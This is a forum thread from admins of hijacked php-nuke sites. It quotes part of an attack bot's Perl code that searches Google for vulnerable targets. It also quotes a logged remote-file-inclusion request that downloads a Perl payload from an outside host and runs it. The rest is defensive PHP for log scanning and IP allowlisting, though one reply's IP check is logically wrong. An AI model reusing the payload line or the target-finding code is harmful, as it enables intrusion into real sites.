"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;

foreach $dom (@dominios)
{
push (@str,"%22Page+Generation%3A%22+%7C+%22php-nuke%22+inurl%3Amodules.php%3Fname%3D+site%3A".$dom."%20");
}

my $query="www.google.ro/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;

}

All started via a get command to one of my Admin PHP functions, as in this example of many different Admin PHP functions:


66.41.68.96 - - [16/Jun/2006:23:42:37 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.exchangechannel.com/welcome/family/php/images/.xpl/cmd.txt?&cmd=cd%20/tmp;GET%20http://www.exchangechannel.com/welcome/family/php/images/.xpl/flux%20>%20flux;perl%20flux;rm%20flux*? HTTP/1.1

There are no signs this is going on in the background ("Because I am only being used as a bridge, and host none of their utilities"), and it required no PHP changes for this group to use my site as a bridge, no admin privileges, nada! ("Nothing")

Last Count there were over 50 sites hosting interfaces to this group ("I know this because my site is/was being used as a bridge for this group"), so I think the latest defacement was and is more than what it may have seemed to be to most web sites attacked, thinking that it was limited to defacement only.

Early on, I even found perl code inside an Avatar that could have been used. While I was making my changes another Admin was added, but I deleted this new admin ID and the Avatar, and turned the ability to upload Avatars off on this subdomain.

Hope this helps explain some of the current methods being used.
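The log line quoted above is the tell for this attack: an include-path parameter (phpbb_root_path) being handed a remote URL. As an added example that is not part of this post, here is a small PHP script that scans access-log lines for that pattern so the requests can be found before the bot is discovered some other way. The log lines inside it are constructed, and attacker.example is a placeholder host, not an address from this thread.

```php
<?php
// Added example, not the poster's code: scan Apache access-log lines for
// requests whose query string hands a remote URL to a script parameter, the
// remote-file-inclusion pattern seen in the log line quoted above.
// The lines below are constructed; attacker.example is a placeholder host.

$sample_log = <<<'LOG'
192.0.2.10 - - [16/Jun/2006:23:42:37 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://attacker.example/cmd.txt? HTTP/1.1" 200 512
192.0.2.11 - - [16/Jun/2006:23:43:01 -0700] "GET /modules.php?name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 8120
192.0.2.12 - - [16/Jun/2006:23:44:15 -0700] "GET /index.php?page=https%3A%2F%2Fattacker.example%2Fx.txt HTTP/1.1" 200 0
LOG;

// Returns one array per suspicious request: client address, parameter name
// and the decoded remote URL that was passed in it.
function find_remote_include_attempts($log)
{
    $findings = array();
    foreach (preg_split('/\r?\n/', $log) as $line) {
        // Client address and request target from the common/combined log format.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP\/[0-9.]+"/', $line, $m)) {
            continue;
        }
        $client = $m[1];
        $qpos = strpos($m[2], '?');
        if ($qpos === false) {
            continue;                    // no query string, nothing to inspect
        }
        // Split the raw query ourselves: parse_str() rewrites parameter names
        // and would hide what was actually sent.
        foreach (explode('&', substr($m[2], $qpos + 1)) as $pair) {
            $kv = explode('=', $pair, 2);
            if (count($kv) < 2) {
                continue;
            }
            $name  = rawurldecode($kv[0]);
            $value = rawurldecode($kv[1]);
            // A value beginning with a URL scheme is what an include-path
            // parameter (phpbb_root_path and friends) receives in an RFI attempt.
            if (preg_match('#^(?:https?|ftp)://#i', $value)) {
                $findings[] = array('client' => $client, 'param' => $name, 'url' => $value);
            }
        }
    }
    return $findings;
}

foreach (find_remote_include_attempts($sample_log) as $f) {
    printf("%s  param=%s  url=%s\n", $f['client'], $f['param'], $f['url']);
}
```

Run against the constructed input it reports the first and third lines and ignores the ordinary forum request. Percent-encoded values are decoded before the check, since an attacker is free to encode the scheme; for a real log, feed the file contents in place of $sample_log.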

Thug21
Just Chillin'
Premium Member
join:2005-08-21

Hello ZOverload:

I tried "// IP check for Admin fuctions in admin.php ZOverLord
$ip = preg_split("/./", $REMOTE_ADDR);
if (($ip[0] < 68) OR ($ip[0] > 71)) {
echo "You are ???????? and are ??????? STUPID as WELL!";
return true;
}
// END of IP check for Admin fuctions in admin.php"

in my admin.php and it seems to block any IP that starts with 68 to 71. I need it to allow only IP's in the 68-71 range. Please let me know what I can do to achieve that.

Thanks!

Cudni
La Merma - Vigilado
MVM
join:2003-12-20
Someshire

try reversing
// IP check for Admin fuctions in admin.php ZOverLord
$ip = preg_split("/./", $REMOTE_ADDR);
if (($ip[0] > 68) OR ($ip[0] < 71)) {
echo "You are ???????? and are ??????? STUPID as WELL!";
return true;
}
// END of IP check for Admin fuctions in admin.php

Cudni

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

Thanks Cudni.

I will try to test it, not sure that would work.

Cudni
La Merma - Vigilado
MVM
join:2003-12-20
Someshire

it is good you're testing it because i just reversed, without much thinking, what you posted earlier

Cudni

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

My bad. Here is a fix; it works with explode in place of preg_split.


// IP check for Admin fuctions in admin??.php ZOverLord
$ip = explode(".", $REMOTE_ADDR);
if (($ip[0] < 68) OR ($ip[0] > 71)) {
echo "You are ???????? and are ??????? STUPID as Well!";
return true;
}
// END of IP check for Admin fuctions in admin.php

Please post if this worked. I tested it, and it worked as planned; it seems that the preg_split included in the first example was not populating the IP variable properly.

Thug21
Just Chillin'
Premium Member
join:2005-08-21

to ZOverLord
Still seems to lock me out, regardless of the IP I put in the code. I noticed you are using php-nuke, I am using postnuke. Does that make any difference ?

Thanks!

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

said by Thug21:

Still seems to lock me out, regardless of the IP I put in the code. I noticed you are using php-nuke, I am using postnuke. Does that make any difference ?

Thanks!
Should not make a difference, put this line in for testing to see what your IP really is:


// IP check for Admin fuctions in admin??.php ZOverLord
// This first line is for testing only!
echo "Your IP Address is $REMOTE_ADDR";
// Remove the line above after testing
$ip = explode(".", $REMOTE_ADDR);
if (($ip[0] < 68) OR ($ip[0] > 71)) {
echo "You are ???????? and are ??????? STUPID as Well!";
return true;
}
// END of IP check for Admin fuctions in admin.php

So....the question is, is your IP address really between 68.x.x.x and 71.x.x.x ?
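The explode-based check above and the debugging version just posted both compare the first octet only, which works for a single 68-71 style range but not for a mix of exact addresses and blocks. As an added example, not ZOverLord's published code or the contents of his zip, here is one way to write the same admin.php check as an allowlist of addresses and CIDR blocks that reads the address from $_SERVER instead of the register_globals variable $REMOTE_ADDR. The entries in $admin_allow are constructed values to replace with your own.

```php
<?php
// Added example, not ZOverLord's published code: an IPv4 allowlist for the top
// of admin.php that accepts single addresses and CIDR blocks, so a dedicated
// address and a "first octet 68-71" style range are handled by one check.
// The entries below are constructed values; replace them with your own.

$admin_allow = array(
    '203.0.113.7',     // one dedicated address (constructed)
    '68.0.0.0/6',      // 68.0.0.0 - 71.255.255.255, the 68-71 range from the thread
);

// True when $ip (dotted quad) equals $entry or lies inside the CIDR block $entry.
// Anything that is not a valid IPv4 address fails closed.
function ip_in_entry($ip, $entry)
{
    $ip_long = ip2long($ip);
    if ($ip_long === false) {
        return false;
    }
    if (strpos($entry, '/') === false) {
        return $ip_long === ip2long($entry);     // exact address
    }
    list($net, $bits) = explode('/', $entry, 2);
    $net_long = ip2long($net);
    if ($net_long === false || !ctype_digit($bits) || (int) $bits > 32) {
        return false;                            // malformed entry: never match
    }
    $bits = (int) $bits;
    // ~0 << n is the network mask as an integer; masking both sides works on
    // 32- and 64-bit PHP because ip2long yields the same low 32 bits on either.
    $mask = ($bits === 0) ? 0 : (~0 << (32 - $bits));
    return ($ip_long & $mask) === ($net_long & $mask);
}

// True when $ip matches any entry of the allowlist.
function admin_ip_allowed($ip, array $allow)
{
    foreach ($allow as $entry) {
        if (ip_in_entry($ip, $entry)) {
            return true;
        }
    }
    return false;
}

// $_SERVER['REMOTE_ADDR'] is the TCP peer address, which the client cannot pick;
// headers such as X-Forwarded-For are client-supplied and must not replace it.
$remote = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
if (!admin_ip_allowed($remote, $admin_allow)) {
    header('HTTP/1.0 403 Forbidden');
    echo 'Access denied.';
    // exit stops the whole request; a bare return only leaves the current file
    // when admin.php has been included by another script.
    exit;
}
// ... the rest of admin.php follows
```

Test it the way the first post suggests: put an address that is not yours in the list first and confirm you are refused, then add your real one. Two caveats a practitioner will want: ip2long() handles IPv4 only, so the check denies IPv6 clients, and when the site sits behind a reverse proxy or load balancer REMOTE_ADDR is the proxy's address, in which case the allowlist has to be enforced at the proxy instead.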
ZOverLord

I have decided to publish this PHP protection code. Here is a zip file containing the files, any questions, just ask.

»testing.OnlyTheRightAnsw ··· tion.zip

If you would like to see it in action, you are more than welcome to use this. WARNING: the two example links below can cause MANY pop-up windows when using IE ("Even with pop-up blockers installed and running"), so if you are bold enough to test this using IE be sure you have your task manager open to kill IEXPLORER tasks.

Also, the current language may be offensive to some, just a heads up:

http://testing.OnlyTheRightAnswers.com/admin.php


You can also see that I can still find your REAL IP address when you are using IE even if you are behind Proxies by doing this:

http://anonymouse.org/cgi-bin/anon-www.cgi/http://testing.onlytherightanswers.com/admin.php

Cudni
La Merma - Vigilado
MVM
join:2003-12-20
Someshire

but if scripting is disabled in IE it only displays an advert from the anon proxy and your rude advert

Cudni

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

said by Cudni:

but if scripting is disabled in IE it only displays an advert from the anon proxy and your rude advert

Cudni
Yes, at the moment this is true, however I am working on a Generic version that will support all browsers, with or without scripting enabled.

Since this problem is currently MUCH worse than the general public knows about, and since this does offer you total protection from all browsers even in its current form ("When the STUB is installed in the PHP programs you wish to protect"), I felt it was best to release a working version now.

That version will not require any NEW STUB code and will simply be a change to one module "intruder.php" so it will be an easy upgrade as well, when the new release is complete.

Thug21
Just Chillin'
Premium Member
join:2005-08-21

I am sure my IP is in the 68-71 range. I'll try this again later and let you know how it goes